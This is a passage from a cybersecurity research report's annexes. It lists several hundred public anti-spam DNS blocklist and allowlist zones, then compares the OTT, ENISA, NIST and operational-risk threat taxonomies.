Copyright SAINT Consortium. All rights reserved. 136 D2.2 Final Report on Cybersecurity Indicators & Open Source Intelligence Methodologies

(work node)

149 DRBL drbl.ks.cz autowork.drbl.ks.cz ipv4 - - (autowork node)

150 DRBL drbl.ks.cz czdynamic.drbl.ks.cz ipv4 - - (czdynamic node)

151 DRBL drbl.ks.cz vote1.drbl.ks.cz ipv4 - - (vote1 node)

152 DRBL drbl.ks.cz work.drbl.ks.cz ipv4 - - (work node)

153 DRBL host.kz (vote vote.drbl.host.kz ipv4 - - node)

154 DRBL host.kz (work work.drbl.host.kz ipv4 - - node)

155 DRBL ntvinet.net vote.rbl.ntvinet.net ipv4 - - (vote node)

156 DRBL ntvinet.net rbl.ntvinet.net ipv4 - - (work node)

157 DRBL sandy.ru dialup.drbl.sandy.ru ipv4 - - (dialup vote node)

158 DRBL sandy.ru vote.drbl.sandy.ru ipv4 - - (vote node)

159 DRBL sandy.ru work.drbl.sandy.ru ipv4 - - (work node)

160 dronebl.noderebel dronebl.noderebellion.net ipv4 - - lion.net

161 DSBL.org ? list dsbl.dnsbl.net.au ipv4 - - (@dnsbl.net.au)

162 DSBL.org multihop multihop.dsbl.org ipv4 - - smtp relays

163 DSBL.org trusted list.dsbl.org ipv4 - - list

Copyright SAINT Consortium. All rights reserved. 137 D2.2 Final Report on Cybersecurity Indicators & Open Source Intelligence Methodologies

164 DSBL.org unconfirmed.dsbl.org ipv4 - - unconfirmed list

165 EasyNet blackholes blackholes.easynet.nl ipv4 - -

166 EasyNet dynablock dynablock.easynet.nl ipv4 - -

167 EasyNet proxies proxies.blackholes.easynet.nl ipv4 - - blackholes

168 EasyNet spamdomains.blackholes.easynet.nl - - dom spamdomains blackholes

169 EFnet #help RBL rbl.efnethelp.net ipv4 - -

170 ePaxsys dyn DNSBL dyn.dnsbl.epaxsys.net ipv4 - -

171 ePaxsys dyn2 dyn2.dnsbl.epaxsys.net ipv4 - - DNSBL

172 Exsilia proxies proxies.exsilia.net ipv4 - -

173 Exsilia spam spam.exsilia.net ipv4 - -

174 EZNetTools RBL rbl.eznettools.com ipv4 - -

175 Financial Services dnswl.leisi.net ipv4 - - Whitelist

176 flowgoaway.com flowgoaway.com ipv4 - -

177 Gweep Systems msgid.bl.gweep.ca ipv4 - - msgid

178 Gweep Systems proxy.bl.gweep.ca ipv4 - - proxy

179 Gweep Systems random.bl.gweep.ca ipv4 - - random

180 Gweep Systems relays.bl.gweep.ca ipv4 - - relays

181 hilli.dk local blocked.hilli.dk ipv4 - - blocklist

Copyright SAINT Consortium. All rights reserved. 138 D2.2 Final Report on Cybersecurity Indicators & Open Source Intelligence Methodologies

182 IIP Blacklist lookup.dnsbl.iip.lu ipv4 - -

183 imrss.org DSSL dssl.imrss.org ipv4 - -

184 imrss.org MR-OUT mr-out.imrss.org ipv4 - -

185 inflow.noflow.org inflow.noflow.org ipv4 - -

186 Intercept DNS intercept.datapacket.net ipv4 - - Blacklist

187 Intersil Blackholes blackholes.intersil.net ipv4 - -

188 IPQuery.org any any.dnsl.ipquery.org ipv4 - -

189 IPQuery.org backscat.dnsl.ipquery.org ipv4 - - backscat

190 IPQuery.org netblock.dnsl.ipquery.org ipv4 - - netblock

191 IPQuery.org relay relay.dnsl.ipquery.org ipv4 - -

192 IPQuery.org single single.dnsl.ipquery.org ipv4 - -

193 IPv6 Mailserver rbl.ipv6wl.eu - ipv6 - Whitelist

194 IPv6-World.net rbl rbl.ipv6-world.net - ipv6 -

195 JAMMConsulting.c dnsbl.jammconsulting.com ipv4 - - om dnsbl

196 JIPPG's RBL Project dialup.blacklist.jippg.org ipv4 - - (dialup Listings)

197 JIPPG's RBL Project jp.dialup.blacklist.jippg.org ipv4 - - (jp dialup Listings)

198 JIPPG's RBL Project non-jp.dialup.blacklist.jippg.org ipv4 - - (non-jp dialup Listings)

199 Karmasphere karmasphere.email- ipv4 - - DNSBL sender.dnsbl.karmasphere.com

200 Karmasphere karmasphere.email- ipv4 - -

Copyright SAINT Consortium. All rights reserved. 139 D2.2 Final Report on Cybersecurity Indicators & Open Source Intelligence Methodologies

DNSWL sender.dnswl.karmasphere.com

201 Kewlio.net TOR is-tor.kewlio.net.uk ipv4 - - node checker

202 Kropka all all.rbl.kropka.net ipv4 - -

203 Kropka backscatter backscatter.rbl.kropka.net ipv4 - -

204 Kropka dialup dialup.rbl.kropka.net ipv4 - -

205 Kropka form form.rbl.kropka.net ipv4 - -

206 Kropka ip ip.rbl.kropka.net ipv4 - -

207 Kropka lame-av lame-av.rbl.kropka.net ipv4 - -

208 Kropka op op.rbl.kropka.net ipv4 - -

209 Kropka or or.rbl.kropka.net ipv4 - -

210 lbl.lagengymnastik lbl.lagengymnastik.dk ipv4 - - .dk

211 lbl.lagengymnastik bogon.lbl.lagengymnastik.dk ipv4 - - .dk (bogon)

212 lbl.lagengymnastik policy.lbl.lagengymnastik.dk ipv4 - - .dk (policy)

213 lbl.lagengymnastik spam.lbl.lagengymnastik.dk ipv4 - - .dk (spam)

214 LUCKYSEVEN (fake luckyseven.dnsbl.net ipv4 - - blacklist)

215 LumberCartel.org cbs.lumbercartel.org ipv4 - - cbs (clueless bounce senders)

216 LumberCartel.org jms.lumbercartel.org ipv4 - - jms (junk mail senders)

217 LumberCartel.org whitelist.lumbercartel.org ipv4 - - whitelist

218 mail.people.it mail.people.it ipv4 - -

Copyright SAINT Consortium. All rights reserved. 140 D2.2 Final Report on Cybersecurity Indicators & Open Source Intelligence Methodologies

219 mailabusedatabas mailabusedatabase.com ipv4 - - e RBL

220 mailabusedatabas generic.rwl.mailabusedatabase.com ipv4 - - e RWL

221 MailBlacklist.com service.mailblacklist.com ipv4 ipv6 dom EmailBlacklist

222 MailBlacklist.com service.mailwhitelist.com ipv4 ipv6 dom EmailWhitelist

223 maildeflector.net maildeflector.net ipv4 - -

224 Mailer.mobi dnsbl.mailer.mobi ipv4 - -

225 Mailhosts.org IPBL ipbl.mailhosts.org ipv4 ipv6 -

226 Mailhosts.org ipwl.mailhosts.org ipv4 ipv6 - IPWL

227 Mailhosts.org rhsbl.mailhosts.org - - dom RHSBL

228 Mailhosts.org rhswl.mailhosts.org - - dom RHSWL

229 Mailhosts.org shortlist.mailhosts.org ipv4 - - SHORTLIST

230 Mailhosts.org xpews.mailhosts.org ipv4 - - XPEWS

231 MailPolice adult adult.rhs.mailpolice.com - - dom

232 MailPolice adv adv.rhs.mailpolice.com - - dom

233 MailPolice block block.rhs.mailpolice.com - - dom

234 MailPolice bulk bulk.rhs.mailpolice.com - - dom

235 MailPolice dynamic.rhs.mailpolice.com - - dom dynamic

236 MailPolice fraud fraud.rhs.mailpolice.com ipv4 - dom

237 MailPolice porn porn.rhs.mailpolice.com - - dom

Copyright SAINT Consortium. All rights reserved. 141 D2.2 Final Report on Cybersecurity Indicators & Open Source Intelligence Methodologies

238 MailPolice redir redir.rhs.mailpolice.com - - dom

239 MailPolice webmail.rhs.mailpolice.com - - dom webmail

240 Mailprove c10.rbl.hk ipv4 - -

241 MAPS DUL dul.maps.vix.com ipv4 - - (@vix.com)

242 MAPS DUL dialups.mail-abuse.org ipv4 - - (Dynamic User List)

243 MAPS NML nml.mail-abuse.org ipv4 - -

244 MAPS NML (Non- nonconfirm.mail-abuse.org ipv4 - - confirmed Mail List)

245 MAPS OPS proxies.mail-abuse.org ipv4 - -

246 MAPS RBL rbl.mail-abuse.org ipv4 - -

247 MAPS RBL rbl.maps.vix.com ipv4 - - (@vix.com)

248 MAPS RBL blackholes.mail-abuse.org ipv4 - - (Realtime Blackhole List)

249 MAPS RBL+ rbl-plus.mail-abuse.org ipv4 - -

250 MAPS RSS (Relay relays.mail-abuse.org ipv4 - - Spam Stopper)

251 McFadden sbl.csma.biz ipv4 - - Associates E-mail Blacklist (long timeframe)

252 McFadden bl.csma.biz ipv4 - - Associates E-mail Blacklist (short timeframe)

253 MessageLabs VBL vbl.messagelabs.com ipv4 - -

Copyright SAINT Consortium. All rights reserved. 142 D2.2 Final Report on Cybersecurity Indicators & Open Source Intelligence Methodologies

254 Monkeys bandwidth-pigs.monkeys.com ipv4 - - bandwidth-pigs

255 Monkeys client- client-domain.sjesl.monkeys.com - - dom domain

256 Monkeys formmail formmail.relays.monkeys.com ipv4 - - relays

257 Monkeys helo- helo-domain.sjesl.monkeys.com - - dom domain

258 Monkeys proxies proxies.relays.monkeys.com ipv4 - - relays

259 Monkeys sender- sender-address.sjesl.monkeys.com ipv4 - - address

260 Monkeys sender- sender-domain.sjesl.monkeys.com - - dom domain

261 Monkeys sender- sender-domain- - - dom domain-validate validate.sjesl.monkeys.com

262 MW-Internet RBL rbl.mw-internet.net ipv4 - -

263 NetOp IP country.netop.org ipv4 - - geolocation

264 NJABL dnsbl.njabl.org ipv4 - -

265 NJABL bhnc (bad bhnc.njabl.org ipv4 - - host, no cookie)

266 NJABL combined combined.njabl.org ipv4 - -

267 NJABL DNSBL of dynablock.njabl.org ipv4 - - dynamic ip spaces

268 nospam.ant.pl nospam.ant.pl ipv4 - -

269 NThelp okrelays okrelays.nthelp.com ipv4 - -

270 NThelp relays relays.nthelp.com ipv4 - -

271 nzl.net isp whitelist isp.dns.nzl.net ipv4 - -

Copyright SAINT Consortium. All rights reserved. 143 D2.2 Final Report on Cybersecurity Indicators & Open Source Intelligence Methodologies

272 olsentech.net spam.olsentech.net ipv4 - - DNSBL

273 Open Whois bl.open-whois.org - - dom

274 OpenLists openlists.orbs.org ipv4 - -

275 ORBITrbl rbl.orbitrbl.com ipv4 - -

276 ORBL or.orbl.org ipv4 - -

277 ORBS delayed- delayed-outputs.orbs.org ipv4 - - outputs

278 ORBS inputs inputs.orbs.org ipv4 - -

279 ORBS manual manual.orbs.org ipv4 - -

280 ORBS outputs outputs.orbs.org ipv4 - -

281 ORBS relays relays.orbs.org ipv4 - -

282 ORBS spamsource- spamsource-netblocks.orbs.org ipv4 - - netblocks

283 ORBS spamsources spamsources.orbs.org ipv4 - -

284 ORBS untestable- untestable-netblocks.orbs.org ipv4 - - netblocks

285 ORBZ inputs orbz.gst-group.co.uk ipv4 - -

286 ORBZ manual manual.orbz.gst-group.co.uk ipv4 - -

287 orbz.org inputs inputs.orbz.org ipv4 - -

288 orbz.org outputs outputs.orbz.org ipv4 - -

289 Orca DUL dul.orca.bc.ca ipv4 - -

290 ORDB.org relays.ordb.org ipv4 - -

291 OsiruSoft blocktest.relays.osirusoft.com ipv4 - - blocktest.relays

292 OsiruSoft dialups.relays.osirusoft.com ipv4 - - dialups.relays

Copyright SAINT Consortium. All rights reserved. 144 D2.2 Final Report on Cybersecurity Indicators & Open Source Intelligence Methodologies

293 | OsiruSoft inputs.relays | inputs.relays.osirusoft.com | ipv4 | - | -
294 | OsiruSoft openlist.relays | openlist.relays.osirusoft.com | ipv4 | - | -
295 | OsiruSoft outputs.relays | outputs.relays.osirusoft.com | ipv4 | - | -
296 | OsiruSoft proxy.relays | proxy.relays.osirusoft.com | ipv4 | - | -
297 | OsiruSoft relays | relays.osirusoft.com | ipv4 | - | -
298 | OsiruSoft socks.relays | socks.relays.osirusoft.com | ipv4 | - | -
299 | OsiruSoft spamsites.relays | spamsites.relays.osirusoft.com | ipv4 | - | -
300 | OsiruSoft spamsources.relays | spamsources.relays.osirusoft.com | ipv4 | - | -
301 | Pan-Am Dynamic List | pdl.pan-am.ca | ipv4 | - | -
302 | Pan-Am Dynamic List (@bofh.it) | pdl.bofh.it | ipv4 | - | -
303 | Pan-Am Dynamic List (@dnsbl.net.au) | pdl.dnsbl.net.au | ipv4 | - | -
304 | Pan-Am Dynamic List (@visi.com) | dialups.visi.com | ipv4 | - | -
305 | Pedantic.org netblock | netblock.pedantic.org | ipv4 | - | -
306 | PHPrbl | rbl.init1.nl | ipv4 | - | -
307 | Polar Communications Admin RBL | rbl.polarcomm.net | ipv4 | - | -
308 | ppbl.beat.st | ppbl.beat.st | ipv4 | - | -


309 | proxyBL | dnsbl.proxybl.org | ipv4 | - | -
310 | pss.spambusters.org.ar | pss.spambusters.org.ar | ipv4 | - | -
311 | query.trustic.com | query.trustic.com | ipv4 | - | -
312 | Quorum.to | list.quorum.to | ipv4 | - | -
313 | Radparker Relay Spam Stopper | relays.radparker.com | ipv4 | - | -
314 | RangersBL combined | dnsbl.rangers.eu.org | ipv4 | - | -
315 | RangersBL generic IP range | dynamic.dnsbl.rangers.eu.org | ipv4 | - | -
316 | RangersBL misconfigured filters | lame.dnsbl.rangers.eu.org | ipv4 | - | -
317 | RangersBL spam source | spam.dnsbl.rangers.eu.org | ipv4 | - | -
318 | RangersBL spam supporting ISP | spamsupport.dnsbl.rangers.eu.org | ipv4 | - | -
319 | RangersBL virus/worm source | worm.dnsbl.rangers.eu.org | ipv4 | - | -
320 | rbl-plus.hea.net | rbl-plus.hea.net | ipv4 | - | -
321 | rbl.apluslock.com | rbl.apluslock.com | ipv4 | - | -
322 | rbl.bulkfeeds.jp | rbl.bulkfeeds.jp | - | - | dom
323 | rbl.echelon.pl | rbl.echelon.pl | ipv4 | - | -
324 | rbl.faynticrbl.org | rbl.faynticrbl.org | ipv4 | - | -
325 | rbl.firstbase.com | rbl.firstbase.com | ipv4 | - | -
326 | rbl.fnidder.dk | rbl.fnidder.dk | ipv4 | - | -
327 | rbl.ma.krakow.pl | rbl.ma.krakow.pl | ipv4 | - | -
328 | rbl.openrbl.org | rbl.openrbl.org | ipv4 | - | -


329 | rbl.pil.dk | rbl.pil.dk | ipv4 | - | -
330 | rbl.rope.net | rbl.rope.net | ipv4 | - | -
331 | rbl.sns.ro (hardcore) | hardcore.rbl.sns.ro | ipv4 | - | dom
332 | rbl.sns.ro (softcore) | softcore.rbl.sns.ro | ipv4 | - | dom
333 | rbl.spam.org.tr | rbl.spam.org.tr | ipv4 | - | -
334 | rbl.stonehenge.com | rbl.stonehenge.com | ipv4 | - | -
335 | rblmap.tu-berlin.de | rblmap.tu-berlin.de | ipv4 | - | -
336 | Reactive Autonomous Blackhole List | rabl.nuclearelephant.com | ipv4 | - | -
337 | relays.visi.com | relays.visi.com | ipv4 | - | -
338 | relaywatcher.n13mbl.com | relaywatcher.n13mbl.com | ipv4 | - | -
339 | rfc-ignorant.org abuse | abuse.rfc-ignorant.org | - | - | dom
340 | rfc-ignorant.org bogusmx | bogusmx.rfc-ignorant.org | - | - | dom
341 | rfc-ignorant.org DSN (<>) | dsn.rfc-ignorant.org | - | - | dom
342 | rfc-ignorant.org ipwhois | ipwhois.rfc-ignorant.org | ipv4 | - | -
343 | rfc-ignorant.org postmaster | postmaster.rfc-ignorant.org | - | - | dom
344 | rfc-ignorant.org whois | whois.rfc-ignorant.org | - | - | dom
345 | Rominet china | china.rominet.net | ipv4 | - | -


346 | Rominet hong-kong | hong-kong.rominet.net | ipv4 | - | -
347 | Rominet korea | korea.rominet.net | ipv4 | - | -
348 | Rominet taiwan | taiwan.rominet.net | ipv4 | - | -
349 | RURBL | db.rurbl.ru | ipv4 | - | -
350 | Russian Dial-up User List | dul.ru | ipv4 | - | -
351 | s5h.net IPv6 RBL | ipv6.all.s5h.net | - | ipv6 | -
352 | sandes.dk blackholes | blackholes.sandes.dk | ipv4 | - | -
353 | sandes.dk relays | relays.sandes.dk | ipv4 | - | -
354 | SBBL (they.com) | sbbl.they.com | ipv4 | - | -
355 | SBG-RBL.ORG (dyn) | dyn.sbg-rbl.org | ipv4 | - | -
356 | SBG-RBL.ORG (dyn2) | dyn2.sbg-rbl.org | - | - | dom
357 | SBG-RBL.ORG (sbg) | sbg.sbg-rbl.org | ipv4 | - | -
358 | sbl.2stepback.dk | sbl.2stepback.dk | ipv4 | - | -
359 | Scrollout iRBL (all categories) | (hidden) | ipv4 | - | -
360 | Scrollout iRBL (all countries) | bl.scrollout.com | ipv4 | - | -
361 | securityplanet.nl blacklist | black.dnsbl.securityplanet.nl | ipv4 | - | -
362 | securityplanet.nl whitelist | white.dnsbl.securityplanet.nl | ipv4 | - | -
363 | SecuritySage RHSBL | blackhole.securitysage.com | - | - | dom
364 | selwerd XBL | xbl.selwerd.cx | ipv4 | - | -


365 | SenderDB IP4R database | pub.senderdb.net | ipv4 | - | -
366 | SHLINK bl | bl.shlink.org | ipv4 | - | -
367 | SHLINK dmm | dmm.shlink.org | ipv4 | - | -
368 | SHLINK dyn | dyn.shlink.org | ipv4 | - | -
369 | SHLINK rhsbl | rhsbl.shlink.org | - | - | dom
370 | SHLINK rhswl | rhswl.shlink.org | - | - | dom
371 | SHLINK wl | wl.shlink.org | ipv4 | - | -
372 | Shub-Inter.Net RelayIPs | relayips.rbl.shub-inter.net | ipv4 | - | -
373 | Shub-Inter.Net SpamIPs | spamips.rbl.shub-inter.net | ipv4 | - | -
374 | snark.net | rbl.snark.net | ipv4 | - | -
375 | sober.bl.spamtraps.org | sober.bl.spamtraps.org | ipv4 | - | -
376 | Solid.net Country DNSBL | country.dnsbl.solid.net | ipv4 | - | -
377 | Solid.net DNSBL | dnsbl.solid.net | ipv4 | - | -
378 | Solid.net Pool DNSBL | pool.dnsbl.solid.net | ipv4 | - | -
379 | SORBS ? zone (@dnsbl.net.au) | sorbs.dnsbl.net.au | ipv4 | - | -
380 | SORBS Dynamic IP Addresses (old) | dynablock.sorbs.net | ipv4 | - | -
381 | souphost.com country RBL | country.dnsbl.souphost.com | ipv4 | - | -
382 | Spam Grouper IP only list | singlebl.spamgrouper.com | ipv4 | - | -

383 | Spam Grouper Net block list (old) | netblockbl.spamgrouper.com | ipv4 | - | -

384 | Spam-RBL | map.spam-rbl.com | ipv4 | - | -
385 | spam.shri.net | spam.shri.net | ipv4 | - | -
386 | spam.sux.com impersonator.lists | impersonator.lists.spam.sux.com | ipv4 | - | -
387 | spam.sux.com lists | lists.spam.sux.com | ipv4 | - | -
388 | spam.wonk.org | spam.wonk.org | ipv4 | - | -
389 | spam.wytnij.to | spam.wytnij.to | ipv4 | - | -
390 | Spamanalysis.org GeoBL (deny all) | geobl.spamanalysis.org | ipv4 | - | -
391 | SpamBag Private list | blacklist.spambag.org | ipv4 | - | -
392 | spamblocked asiaspam | asiaspam.spamblocked.com | ipv4 | - | -
393 | spamblocked eurospam | eurospam.spamblocked.com | ipv4 | - | -
394 | spamblocked isps | isps.spamblocked.com | ipv4 | - | -
395 | spamblocked lacnic | lacnic.spamblocked.com | ipv4 | - | -
396 | spamblocked spamsources | spamsources.spamblocked.com | ipv4 | - | -
397 | spamblocked whitelist | whitelist.spamblocked.com | ipv4 | - | -
398 | SpamChampuru DNSBL | dnsbl.spam-champuru.livedoor.com | ipv4 | - | -
399 | Spamhaus SBL (@OsiruSoft relays) | spamhaus.relays.osirusoft.com | ipv4 | - | -
400 | spamsites.org (@dnsbl.net.au) | spamsites.dnsbl.net.au | ipv4 | - | -


401 | spamsources.dnsbl.info | spamsources.dnsbl.info | ipv4 | - | -
402 | spamsources.yamta.org | spamsources.yamta.org | ipv4 | - | -
403 | spbl.bl.winbots.org | spbl.bl.winbots.org | ipv4 | - | -
404 | SPEWS Level 1 | l1.spews.dnsbl.sorbs.net | ipv4 | - | -
405 | SPEWS Level 1 (@OsiruSoft relays) | spews.relays.osirusoft.com | ipv4 | - | -
406 | SPEWS Level 2 | l2.spews.dnsbl.sorbs.net | ipv4 | - | -
407 | SPEWS Level ? (@dnsbl.net.au) | spews.dnsbl.net.au | ipv4 | - | -
408 | SPEWS Level ? (@TransIP) | spews.block.transip.nl | ipv4 | - | -
409 | spider.realtimespiderlist.com | spider.realtimespiderlist.com | ipv4 | - | -
410 | squawk.com local blocklist | blocklist.squawk.com | ipv4 | - | -
411 | squawk.com local blocklist2 | blocklist2.squawk.com | ipv4 | - | -
412 | StopSpam.org badhost | badhost.stopspam.org | ipv4 | - | -
413 | StopSpam.org block | block.stopspam.org | ipv4 | - | -
414 | StopSpam.org dnsbl | dnsbl.stopspam.org | ipv4 | - | -
415 | summersault.com Blacklist | bl.summersault.com | ipv4 | - | -
416 | summersault.com Whitelist | wl.summersault.com | ipv4 | - | -

417 | SURBL ab (AbuseButler web sites) | ab.surbl.org | ipv4 | - | dom

418 | SURBL jp (jwSpamSpy + Prolocation sites) | jp.surbl.org | ipv4 | - | dom
419 | SURBL multi (@dnsbl.net.au) | surbl.dnsbl.net.au | ipv4 | - | dom
420 | SURBL ob (Outblaze URI blacklist) | ob.surbl.org | ipv4 | - | dom
421 | SURBL ph (Phishing and malware sites) | ph.surbl.org | ipv4 | - | dom
422 | SURBL sc (SpamCop web sites) | sc.surbl.org | ipv4 | - | dom
423 | SURBL ws (sa-blacklist web sites) | ws.surbl.org | ipv4 | - | dom
424 | SURBL xs (snowshoe and pill domains) | xs.surbl.org | ipv4 | - | dom
425 | SwiftBL | dnsbl.swiftbl.org | ipv4 | - | -
426 | Technovision Spamsource List | bl.technovision.dk | ipv4 | - | -
427 | TechTheft DNSBL | bl.techtheft.info | ipv4 | - | -
428 | TechTheft DNSBL bogon | bogon.bl.techtheft.info | ipv4 | - | -
429 | TechTheft DNSBL conferr | conferr.bl.techtheft.info | ipv4 | - | -
430 | TechTheft DNSBL domain | domain.bl.techtheft.info | ipv4 | - | -
431 | TechTheft DNSBL expanded | expanded.bl.techtheft.info | ipv4 | - | -


432 | TechTheft DNSBL isp | isp.bl.techtheft.info | ipv4 | - | -
433 | TechTheft DNSBL nana | nana.bl.techtheft.info | ipv4 | - | -
434 | TechTheft DNSBL other | other.bl.techtheft.info | ipv4 | - | -
435 | TechTheft DNSBL robot | robot.bl.techtheft.info | ipv4 | - | -
436 | TechTheft DNSBL scanning | scanning.bl.techtheft.info | ipv4 | - | -
437 | TechTheft DNSBL source | source.bl.techtheft.info | ipv4 | - | -
438 | TechTheft DNSBL support | support.bl.techtheft.info | ipv4 | - | -
439 | TechTheft DNSBL virus | virus.bl.techtheft.info | ipv4 | - | -
440 | TechTheft DNSBL watchlist | watchlist.bl.techtheft.info | ipv4 | - | -
441 | TechTheft DNSBL web | web.bl.techtheft.info | ipv4 | - | -
442 | TechTheft DNSBL whitelist | whitelist.bl.techtheft.info | ipv4 | - | -
443 | TechTheft DNSBL whitelist (old zone) | whitelist.techtheft.info | ipv4 | - | -
444 | TechTheft DNSBL whois (bad) | bad.whois.bl.techtheft.info | - | - | dom
445 | TechTheft DNSBL whois (combined) | whois.bl.techtheft.info | - | - | dom
446 | TechTheft DNSBL whois (good) | good.whois.bl.techtheft.info | - | - | dom
447 | test.blocklist.org | test.blocklist.org | ipv4 | - | -


448 | the-carrot-and-the-stick.com BL | reject.the-carrot-and-the-stick.com | ipv4 | - | -
449 | the-carrot-and-the-stick.com WL | accept.the-carrot-and-the-stick.com | ipv4 | - | -
450 | TQMCube China | prc.tqmcube.com | ipv4 | - | -
451 | TQMCube Composite | dnsbl.tqmcube.com | ipv4 | - | -
452 | TQMCube Dynamic Ranges | dhcp.tqmcube.com | ipv4 | - | -
453 | TQMCube South Korea | ko.tqmcube.com | ipv4 | - | -
454 | TQMCube Spam Trap | spam.tqmcube.com | ipv4 | - | -
455 | TQMCube world | world.tqmcube.com | ipv4 | - | -
456 | TransIP proxy | proxy.block.transip.nl | ipv4 | - | -
457 | TransIP residential | residential.block.transip.nl | ipv4 | - | -
458 | TransIP spamdomain | spamdomain.block.transip.nl | - | - | dom
459 | TransIP spamsource | spamsource.block.transip.nl | ipv4 | - | -
460 | TRBL | spamtrap.trblspam.com | ipv4 | - | -
461 | TRIUMF.ca DNSBL (old zone) | rbl.triumf.ca | ipv4 | - | -
462 | Trust My Mail | trust.trustmymail.org | ipv4 | - | -
463 | Trusted Forwarder SPF Global Whitelist | wl.trusted-forwarder.org | ipv4 | - | dom
464 | UCEB | blackholes.uceb.org | ipv4 | - | -
465 | UCEPROTECT Level ? (@dnsbl.net.au) | ucepn.dnsbl.net.au | ipv4 | - | -


466 | uib.no blacklist | rbl.uib.no | ipv4 | - | -
467 | uib.no whitelist | rbl-ok.uib.no | ipv4 | - | -
468 | Unsubscribe Blacklist UBL (@LashBack) | ubl.lashback.com | ipv4 | - | -
469 | Uppsala University BL | intruders.docs.uu.se | ipv4 | - | -
470 | v6net.org | spammers.v6net.org | ipv4 | - | -
471 | Verio Block List | vbl.mookystick.com | ipv4 | - | -
472 | Virbl whitelist | nlwhitelist.dnsbl.bit.nl | ipv4 | - | -
473 | vox.schpider.com | vox.schpider.com | ipv4 | - | -
474 | Web-o-Trust | cabal.web-o-trust.org | ipv4 | - | -
475 | WebEquipped.com block list | dnsbl.webequipped.com | ipv4 | - | -
476 | will-spam-for-food.eu.org | will-spam-for-food.eu.org | ipv4 | - | -
477 | wirehub.net blackholes | blackholes.wirehub.net | ipv4 | - | -
478 | wirehub.net blackholes (@reynolds.net.au) | wpb.bl.reynolds.net.au | ipv4 | - | -
479 | wirehub.net dynablock | dynablock.wirehub.net | ipv4 | - | -
480 | wirehub.net proxies blackholes | proxies.blackholes.wirehub.net | ipv4 | - | -
481 | WPBL - Weighted Private Block List (@dnsbl.net.au) | wpbl.dnsbl.net.au | ipv4 | - | -

482 | WPBL - Weighted Private Block List (old zone) | dnsbl.wpbl.pc9.org | ipv4 | - | -

483 | ybl.megacity.org | ybl.megacity.org | ipv4 | - | -
484 | Zap Junk | spam.zapjunk.com | ipv4 | - | -
485 | ZetaBL | dnsbl.zetabl.org | ipv4 | - | -
486 | ZoneEdit combined RHSBL | zebl.zoneedit.com | - | - | dom
487 | ZoneEdit deny DNS services domains | ban.zebl.zoneedit.com | - | - | dom
488 | zta.birdsong.org | zta.birdsong.org | ipv4 | - | -


17 Annex C Threat Taxonomy Comparisons

Threat Taxonomy Comparisons

Two possible evaluation ideas, following a comparative case study by SANS [169], are to use different threat taxonomies for threat scenarios with different risk frameworks, or to use the same risk framework with different assessment techniques. Keys to success for such an implementation would include mapping to security controls, such as NIST SP 800-53, or to security requirements, such as NIST SP 800-171, and calculating probabilities of occurrence and impact based on changes to the threat landscape.

OTT Threat Actions & Ratings

Physical Threats

• Loss of Property
• Theft of Property
• Accidental Destruction of Property
• Natural Destruction of Property
• Intentional Destruction of Property
• Intentional Sabotage of Property
• Intentional Vandalism of Property

Resource Threats

• Disruption of Water Resources
• Disruption of Fuel Resources
• Disruption of Materials Resources
• Disruption of Electrical Resources
• Disruption of Transportation Services
• Disruption of Communications Services
• Disruption of Emergency Services
• Disruption of Governmental Services
• Supplier Viability
• Supplier Supply Chain Failure
• Logistics Provider Failures
• Logistics Route Disruptions
• Technology Services Manipulation

Personnel Threats

• Personnel Labour / Skills Shortage
• Loss of Personnel Resources
• Social Engineering of Personnel Resources

Technical Threats

• Organizational Fingerprinting via Open Sources
• System Fingerprinting
• Credential Discovery
• Misuse of System Credentials
• Escalation of Privilege
• Abuse of System Privileges
• Memory Manipulation
• Cache Poisoning
• Physical Manipulation of Technical Device
• Manipulation of Trusted System

[169] SANS – April 2018 - https://www.sans.org/reading-room/whitepapers/threatintelligence/paper/38360

ENISA Threat Taxonomy

Physical attack (deliberate/ intentional)

• Fraud
• Sabotage
• Vandalism
• Theft (devices, storage media and documents)
• Information leakage/sharing

Unintentional damage / loss of information or IT assets

• Information leakage/sharing due to human error
• Erroneous use or administration of devices and systems
• Using information from an unreliable source
• Unintentional change of data in an information system
• Inadequate design and planning or improper adaptation
• Damage caused by a third party
• Damages resulting from penetration testing
• Loss of information in the cloud
• Loss of (integrity of) sensitive information
• Loss of devices, storage media and documents
• Destruction of records

Disaster (natural, environmental)

• Disaster (natural earthquakes, floods, landslides, tsunamis, heavy rains, heavy snowfalls, heavy winds)
• Fire
• Pollution, dust, corrosion
• Thunder stroke
• Water
• Wildlife
• Explosion
• Dangerous radiation leak
• Unfavourable climatic conditions
• Major events in the environment
• Threats from space / Electromagnetic storm

Failures/ Malfunction

• Failure of devices or systems
• Failure or disruption of communication links (communication networks)
• Malfunction of equipment (devices or systems)
• Failure or disruption of service providers (supply chain)
• Failure or disruption of main supply

Outages

• Loss of resources
• Absence of personnel
• Strike

Eavesdropping/ Interception/ Hijacking

• War driving
• Intercepting compromising emissions
• Interception of information
• Interfering radiation
• Replay of messages
• Network Reconnaissance, Network traffic manipulation and Information gathering
• Man in the middle/ Session hijacking

Nefarious Activity/ Abuse

• Identity theft (Identity Fraud/ Account)
• Receive of unsolicited E-mail
• Denial of service
• Malicious code/ software/ activity
• Social Engineering
• Abuse of Information Leakage
• Generation and use of rogue certificates
• Manipulation of hardware and software
• Manipulation of information
• Misuse of audit tools

Legal

• Violation of laws or regulations / Breach of legislation
• Failure to meet contractual requirements

NIST Risk Assessment Threat Event Taxonomy (Exemplary)

Adversarial

• Perform reconnaissance and gather information (5 sub-elements)
• Craft or create attack tools (6 sub-elements)
• Deliver/insert/install malicious capabilities (14 sub-elements)
• Exploit and compromise (17 sub-elements)

Non-Adversarial

• Spill sensitive information
• Mishandling of critical and/or sensitive information by authorized users
• Incorrect privilege settings
• Communications contention
• Unreadable display
• Earthquake
• Fire

Taxonomy of Operational Cyber Security Risks

Actions of People

Inadvertent
• Mistakes
• Errors
• Omissions

Deliberate
• Fraud
• Sabotage
• Theft
• Vandalism

Systems and Technology Failures

Hardware
• Capacity
• Performance
• Maintenance
• Obsolescence

Systems
• Design
• Specifications
• Integration
• Complexity

Failed Internal Processes

Process controls
• Status monitoring
• Metrics
• Periodic review
• Process ownership

Supporting Processes
• Staffing
• Funding
• Training and development
• Procurement

External Events

Disasters
• Weather event
• Fire
• Flood
• Earthquake
• Unrest
• Pandemic

Legal issues
• Regulatory compliance
• Legislation
• Litigation
